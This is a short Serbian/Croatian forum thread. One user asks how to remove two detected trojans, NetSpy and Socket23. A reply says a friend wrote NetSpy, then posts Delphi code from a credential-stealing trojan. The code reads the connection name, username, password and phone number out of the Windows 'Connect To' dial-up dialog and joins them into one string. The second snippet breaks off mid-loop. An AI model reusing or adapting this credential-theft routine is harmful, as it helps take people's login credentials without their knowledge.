|
berag ::NetCrunch mi je pri trazenju trojanaca pronasao dva servisa i to NetSpy i Socket23. Prvi je na portu 1025, a drugi na portu 5000.
Na internetu sam pronasao nesto malo o njima i navodno su visoko rizicni.
U opisanom postupku kako ih se rjesiti nema tih fajlova pa ne mogu ni da ih se rjesim.
Molim one koji se razumiju, a ovdje bi ih trebalo biti, da napisu svoje misljenje, odgovor, pitanje, komentar.
Joj netspy to je programirao moj ortak i ja sam hteo da izbacim koji trojan ali posto je izasao win2k i XP malo su se neke stvari promenile pa me je mrzelo da otkrivam gde drzi dial up passworde dok je kod win98 sve bilo lako samo izvadis handle iz prozora i povadis text iz field-ova prosto ko pasulj...
Citat:
function KRADI(hChild: hWnd; param: dWord): bool; stdcall;
var
tmp: pchar;
tmp2: string;
begin
getmem(tmp, 1025);
SendMessage(hChild, WM_GETTEXT, 1024, longint(tmp));
tmp2 := StrPas(tmp);
case brojac of
DUP_NAME: STOLEN_DIALUP := tmp2;
DUP_USER: STOLEN_USER := tmp2;
DUP_PASS: STOLEN_PASS := tmp2;
DUP_PHONE: STOLEN_PHONE := tmp2;
end;
freemem(tmp, 1025);
inc(brojac);
end;
i onda samo pozovete i napravite ako nadje prozor Connect to:
Citat:
wnd := FindWindow(nil, 'Connect To');
if iswindow(wnd)=true then
begin
repeat
Waiting := 30;
Brojac := 0;
EnumChildWindows(wnd, @KRADI, 0);
CurData := STOLEN_DIALUP+':'+STOLEN_USER+':'+STOLEN_PASS+':'+STOLEN_PHONE;
Uglavnom ocajno bedan security :-)
|
